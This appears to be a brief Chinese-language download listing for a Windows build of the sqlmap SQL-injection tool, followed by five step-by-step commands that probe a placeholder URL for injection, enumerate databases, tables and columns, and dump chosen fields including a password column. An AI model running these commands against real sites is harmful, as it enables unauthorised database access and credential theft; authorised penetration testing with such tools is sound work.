-
无需Python环境,sqlmap可在Windows系统上直接运行
资源介绍
注入步骤:
检查注入点
sqlmap -u http://url
列数据库信息
sqlmap -u http://url --dbs
指定库名列出所有表
sqlmap -u http://url -D dbname --tables
指定库名表名列出所有字段
sqlmap -u http://url -D dbname -T tablename --columns
指定库名表名字段dump出指定字段
sqlmap -u http://url -D dbname -T tablename -C ac,id,password --dump